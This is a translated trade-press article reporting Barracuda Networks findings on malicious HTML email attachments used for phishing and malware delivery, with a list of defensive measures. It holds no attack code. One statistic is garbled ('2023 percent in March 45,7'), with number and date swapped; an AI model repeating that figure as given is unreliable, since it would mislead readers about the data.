HTML attachments are still the most dangerous file type in email attacks. As a result, attackers are relying more on HTML attachments: their share has doubled in a year, according to Barracuda Networks.
Hypertext Markup Language – HTML for short – is used to create and structure content presented online. This often happens in e-mail communication as well. But one can assume that practical, well thought-out technologies are usually also very popular with criminals. And in fact, HTML is an overly welcome attack tool in phishing, for example to disguise the theft of login data. What's more, in the last ten months, the number of HTML attachments scanned by Barracuda systems that turned out to be malicious has more than doubled. While it was already 21 percent in May last year, the number of HTML files scanned for malicious use rose to 2023 percent in March 45,7.
Many different attacks with individual files
When the recipient opens the HTML file, they are sent via multiple redirects via JavaScript libraries hosted elsewhere to a phishing website or other malicious content that the criminals control. Users are prompted to sign in to access requested information or download a file that may contain malware. But it's still more perfidious.
In some cases, Barracuda researchers have observed that the HTML file itself contains sophisticated malware that embeds the entire malicious payload, including potent scripts and executable files. In contrast to externally hosted JavaScript files, this attack technique is now being used more and more frequently. Therefore, it is important to analyze the entire email with HTML attachments, all redirects, and the content of the email for malicious intent.
Another new feature of the attacks is their diversity. The growing number of malicious files detected is not simply the result of a limited number of mass attacks, but rather many different types of attacks, each using specially crafted files. Around a quarter (27 percent) of the files discovered are now singular, with the remaining three quarters being repetitions or mass distributions of these files.
HTML attachments top the list of file types used for malicious purposes. Not only is the overall volume of malicious HTML attachments increasing, they remain the most common file type used for malicious purposes. Why is that? Because it still works reliably!
Do you have a moment?
Take a few minutes for our 2023 user survey and help make B2B-CYBER-SECURITY.de better!You only have to answer 10 questions and you have an immediate chance to win prizes from Kaspersky, ESET and Bitdefender.
Here you go directly to the survey
What protects against malicious HTML attachments?
- Effective email protection recognizes malicious HTML attachments and can block them. Because these aren't always easy to spot, as described, powerful solutions include machine learning and static code analysis, which examines the content of an email and not just its attachment.
- Educate and raise employee awareness to identify and report potentially malicious HTML attachments. Given the scope and variety of this type of attack, it is always advisable to be cautious with all HTML attachments, especially those from unknown sources. Registration data must never be passed on to third parties.
- Multi-factor authentication (MFA) is still a good access control. Nonetheless, criminals are increasingly employing advanced social engineering techniques, such as relying on employee MFA fatigue. Zero Trust Access measures increase security. An effective Zero Trust solution dynamically monitors multiple parameters: user, device, location, time, resources, and others being accessed. This makes it much more difficult for attackers to compromise the network with stolen credentials.
- However, should a malicious HTML file get through, remediation tools should be in place to quickly identify and remove malicious emails from everyone's inboxes. Automated incident response can help do this before the attack spreads throughout an organization. Additionally, Account Takeover Protection can monitor suspicious account activity and alert you when credentials are compromised.
Adequate cybersecurity is essential given the increasing number of HTML attacks. However, a layered approach of security tools and employee education can help organizations effectively defend against this threat.
More at Barracuda.com
Via Barracuda Networks Striving to make the world a safer place, Barracuda believes that every business should have access to cloud-enabled, enterprise-wide security solutions that are easy to purchase, implement and use. Barracuda protects email, networks, data and applications with innovative solutions that grow and adapt as the customer journey progresses. More than 150.000 companies worldwide trust Barracuda to help them focus on growing their business. For more information, visit www.barracuda.com.